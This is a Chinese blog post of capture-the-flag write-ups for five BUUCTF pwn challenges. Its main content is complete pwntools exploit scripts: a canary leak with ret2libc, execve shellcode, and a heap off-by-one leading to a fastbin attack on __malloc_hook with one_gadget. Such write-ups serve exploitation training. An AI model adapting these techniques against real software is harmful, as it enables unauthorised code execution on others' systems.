BUUCTF pwn wp 56 - 60

最新推荐文章于 2023-05-14 14:58:10 发布
最新推荐文章于 2023-05-14 14:58:10 发布
阅读量253 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120623426
版权

others_babystack

在这里插入图片描述

在这里插入图片描述
绕过canary然后栈溢出

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 26959
filename = "./babystack"
elf = ELF(filename)
# libc = ELF("./")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    main_addr = 0x0000000000400908
    puts_plt = elf.plt["puts"]
    puts_got = elf.got["puts"]
    pop_rdi_addr = 0x0000000000400a93 

    payload = cyclic(0x88) + b'\xff'
    io.sendafter(">> ", "1")
    io.send(payload)
    io.sendafter(">> ", "2")
    io.recvuntil(b"\xff")
    canary = u64(io.recv(7).rjust(8, b'\x00'))

    payload = cyclic(0x88) + p64(canary) + cyclic(8)
    payload += p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

    io.sendafter(">> ", "1")
    io.send(payload)
    io.sendafter(">> ", "3")
    puts_addr = u64(io.recv(6).ljust(8, b"\x00"))
    log.info("puts address: %#x" % puts_addr)
    libc = LibcSearcher("puts", puts_addr)
    libc_base = puts_addr - libc.dump("puts")
    system_addr = libc_base + libc.dump("system")
    binsh_addr = libc_base + libc.dump("str_bin_sh")

    payload = cyclic(0x88) + p64(canary) + cyclic(8)
    payload += p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
    
    io.sendafter(">> ", "1")
    io.send(payload)
    io.sendafter(">> ", "3")


if __name__ == "__main__":
    pwn()
    io.interactive()

pwnable_start

在这里插入图片描述

ret2shellcode, 参考我之前的博客
https://blog.csdn.net/qq_33976344/article/details/118159757

from pwn import *
from pwnlib.util.cyclic import cyclic

context.log_level = "debug"
sel = 1
URL, PORT = "node4.buuoj.cn", 29128
io = process("./start") if sel == 0 else remote(URL, PORT) 

write_addr = 0x08048087

payload1 = cyclic(0x14) + p32(write_addr)
io.sendafter("Let's start the CTF:", payload1)
esp_addr = u32(io.recv(4)) # u32(io.recvline().strip().ljust(4, b"\x00"))

shellcode = asm("xor edx, edx") + asm("xor ecx, ecx")
shellcode += asm("push 0x0068732f") + asm("push 0x6e69622f")
shellcode += asm("mov ebx, esp") + asm("mov eax, 0x0b") + asm("int 0x80")
payload2 = cyclic(0x14) + p32(esp_addr + 0x14) + shellcode

sleep(0.1)
io.send(payload2)
io.interactive()

roarctf_2019_easy_pwn

在这里插入图片描述

终于来了道中规中矩的题目了, 保护不全开, 搁这白给呢[doge]

初步逆向没有发现漏洞, 深入一层看看更基本的函数, 返现write函数里的sub_E26存在off by one漏洞

在这里插入图片描述

在这里插入图片描述

a2是write修改时输入的size, a1是add时输入的size, 如果之后输入的size - pre_size == 10, 则可以多输入1字节, 这个函数人为设计感很强, 故意这么写的吧, 属于是有意留的漏洞了

off-by-one + chunk overlapping + fastbin attack + realloc_hook调整栈 + one gadget

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 29250
filename = "./roarctf_2019_easy_pwn"
elf = ELF(filename)
libc = ELF("./libc64-2.23.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def add(size):
    io.sendlineafter('choice: ', '1')
    io.sendlineafter('size:', str(size))

def write(index, size, data):
    io.sendlineafter('choice: ', '2')
    io.sendlineafter('index:', str(index))
    io.sendlineafter('size:', str(size))
    io.sendafter('content:', data)

def delete(index):
    io.sendlineafter('choice: ', '3')
    io.sendlineafter('index:', str(index))

def show(index):
    io.sendlineafter('choice: ', '4')
    io.sendlineafter('index:', str(index))   


def pwn():
    add(0x18) # chunk0
    add(0x18) # chunk1
    add(0x88) # chunk2
    add(0x88) # chunk3

    add(0x28) # chunk4
    add(0x28) # chunk5
    add(0x68) # chunk6

    payload = cyclic(0x18) + p8(0xb1)
    write(0,34, payload) # write chunk_size
    delete(1)
    add(0xa8) # chunk1

    payload = cyclic(0x18) + p64(0x91)
    write(1, 0x20, payload) # write chunk_size set chunk2 to small bin
    delete(2)
    show(1) # leak main_arena address
    io.recvuntil('content: ')
    io.recv(0x20)
    libc_base = u64(io.recv(8)) - 0x3c4b78 # libc-2.23.so
    log.info("libc base address: %#x" % libc_base)

    malloc_hook = libc_base + libc.sym['__malloc_hook']
    realloc = libc_base + libc.sym['__libc_realloc']
    one_gadget = libc_base + 0x4526a

    '''
    0x45216 execve("/bin/sh", rsp+0x30, environ)
    constraints:
    rax == NULL

    0x4526a execve("/bin/sh", rsp+0x30, environ)
    constraints:
    [rsp+0x30] == NULL

    0xf02a4 execve("/bin/sh", rsp+0x50, environ)
    constraints:
    [rsp+0x50] == NULL

    0xf1147 execve("/bin/sh", rsp+0x70, environ)
    constraints:
    [rsp+0x70] == NULL
    '''

    # gdb.attach(io)

    payload = cyclic(0x28) + p8(0xa1)
    write(4, 50, payload)
    delete(5)    # move top chunk, prevent deleted chunk6 merge with top chunk
    delete(6)
    add(0x98) # chunk2

    payload = cyclic(0x28) + p64(0x71) + p64(malloc_hook - 0x23)
    write(2, 0x38, payload) # fastbin attack write

    add(0x68) # chunk6 idx = 5
    add(0x68) # fake chunk idx = 6

    payload = cyclic(0x13 - 8) + p64(one_gadget) + p64(realloc + 16)
    write(6, 27, payload) # ralloc_hook change stack to satisfy one_gadget condition
    
    # gdb.attach(io)
    add(0x10)


if __name__ == "__main__":
    pwn()
    io.interactive()

注:
libc用buu官网给的, ld用大版本0ubuntu11, 这样可以更好逼近远程环境, 远程的libc版本在glibc-all-in-one居然没有对应的版本可以下载, libc和ld都用2.23-0ubuntu11.3_amd64是打不通本地的, 换libc就能通

在这里插入图片描述

0ctf_2017_babyheap

参考
https://blog.csdn.net/qq_33976344/article/details/119904057

from pwn import *

url, port = "node4.buuoj.cn", 25478 
filename = "./0ctf_2017_babyheap"
elf = ELF(filename)
# libc = ELF("")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def alloc(size):
    io.sendlineafter("Command: ", '1')
    io.sendlineafter("Size: ", str(size))

def fill(idx, cont):
    io.sendlineafter("Command: ", '2')
    io.sendlineafter("Index: ", str(idx))
    io.sendlineafter("Size: ", str(len(cont)))
    io.sendafter("Content: ", cont)

def free(idx):
    io.sendlineafter("Command: ", '3')
    io.sendlineafter("Index: ", str(idx))

def dump(idx):
    io.sendlineafter("Command: ", '4')
    io.sendlineafter("Index: ", str(idx))
    io.recvuntil("Content: \n")
    data = io.recvline()
    return data

def pwn():
	alloc(0x10)
	alloc(0x10)
	alloc(0x10)
	alloc(0x10)
	alloc(0x80)

	free(1)
	free(2)

	payload = cyclic(16) + p64(0) + p64(0x21) + cyclic(16) + p64(0) + p64(0x21) + p8(0x80)
	fill(0, payload)

	payload = cyclic(16) + p64(0) + p64(0x21)
	fill(3, payload)

	alloc(0x10)
	alloc(0x10)

	payload = cyclic(16) + p64(0) + p64(0x91)
	fill(3, payload)
	alloc(0x80)

	free(4)

	main_arena_addr = u64(dump(2)[:8])
	libc_base = main_arena_addr - 0x3c4b78
	__malloc_hook_addr = libc_base + 0x00000000003c4b10
	one_gadget_addr = libc_base + 0x4526a # 0x45216
	log.info("main_arena_addr = 0x%x" % main_arena_addr)
	log.info("libc_base = 0x%x" % libc_base)
	log.info("__malloc_hook_addr = 0x%x" % __malloc_hook_addr)
	log.info("one_gadget_addr = 0x%x" % one_gadget_addr)

	alloc(0x60)
	free(4)
	payload = p64(libc_base + 0x3c4afd) # link fake chunk into fastbin
	fill(2, payload)
	alloc(0x60)
	alloc(0x60)
	payload = p8(0) * 3 + p64(one_gadget_addr) # change __malloc_hook
	fill(6, payload)

	alloc(233) # call one_gaget
	io.interactive()

if __name__ == '__main__':
	pwn()

wustctf2020_closed

在这里插入图片描述
stdout重定向
exec 1>&0 (1>&之间没有空格
在这里插入图片描述

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——others_babystack
mcmuyanga的博客
11-18 1409
others_babystack 附件 步骤: 例行检查,64位程序,开了挺多保护 本地试运行一下程序 64位ida载入,看main函数 1是read函数,存在栈溢出;2是puts函数,3退出 利用思路 泄露canary 由于存在canary,我们首先要想办法泄露出它的值来绕过canary保护,puts函数在输出的时候是遇到’\x00’ 才会结束,我们都知道canary跟在ebp之后,因此我们直接填充‘a’到ebp,正好 可以把canary的截断符覆盖,再输出,就会连canary输出来了,成功泄
BUUCTF others babystack
m0_57754423的博客
02-07 1757
思路: 通过覆盖canary的截断字符"\x00",从而连带打印出canary 而后就是简单的ret2libc了 exp: from pwn import * #p = remote("node4.buuoj.cn",29299) p = process("./babystack") elf = ELF("./babystack") context.log_level ="debug" #libc = ELF("libc-2.23.so") libc = ELF("/lib/x86_64-li
[BUUCTF-pwn] wdb_2020_1st_boom1
weixin_52640415的博客
11-21 3333
网鼎杯 2020 boom1 学习了 BOI Team 的wp,感觉没弄太明白,主要是远程的偏移计算方法。自己消化一下,想出一个自我感觉比较方便的方法。 这是一个虚拟机的题,用给定的一些关键字写个c程序,然后运行得到shell 师傅的方法: 由于都是通过mmap生成的堆,所以跟libc是连续,计算出程序当前变量位置与free_hook和system的偏移 *(free_hook) = system然后free(/bin/sh)就OK了 但问题是本地的偏移通过Gdb得...
BUUCTF刷题2
m0_51251108的博客
05-22 379
gyctf_2020_borrowstack: 关键词:栈迁移 使用可控制的地址覆盖ebp的值,使用leave;ret指令所在地址覆盖ret的值,迁移后要填充4或8 read的时候用send 这题首先注意: 1.bss段离plt,got很近,要适当抬高迁移的位置 3.用system拿,估计还得要栈迁移,麻烦,用og简单, from pwn import* r=remote('node3.buuoj.cn',26005) #r=process('./gyctf_2020_borrowstack') conte
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF ciscn_2019_en_2
小白垃圾笔记2
05-14 125
脚本2和3的区别就是puts的返回地址覆盖不同而已。注意这个64位程序。所以在搜索的时候需要选择amd64那个。只有输入1的时候才会进入encrypt函数,否则会退出。前边调用最多的就是puts,那就通过puts泄露libc。脚本一是本地调试,其中的libc路径是ldd看的。有一个根据strlen函数进行加密的运算。小白垃圾做题笔记,不建议阅读。
BUU刷题(三)
playmaker的博客
03-13 990
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
buuctf actf_2019_babystack
weixin_45441024的博客
12-07 515
buuctf actf_2019_babystack from pwn import * from LibcSearcher import LibcSearcher r = remote("node3.buuoj.cn",27848) elf = ELF("/home/pwn/Desktop/ACTF_2019_babystack") nbytes_length = 0xE0 offset = 0xD0 leave_retn = 0x00400A4E puts_got = elf.got["puts"]
pwntools中fmtstr的使用
fa1c4的blog
02-01 3886
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
kali安装checksec
fa1c4的blog
01-26 3268
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3253
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3034
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2926
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值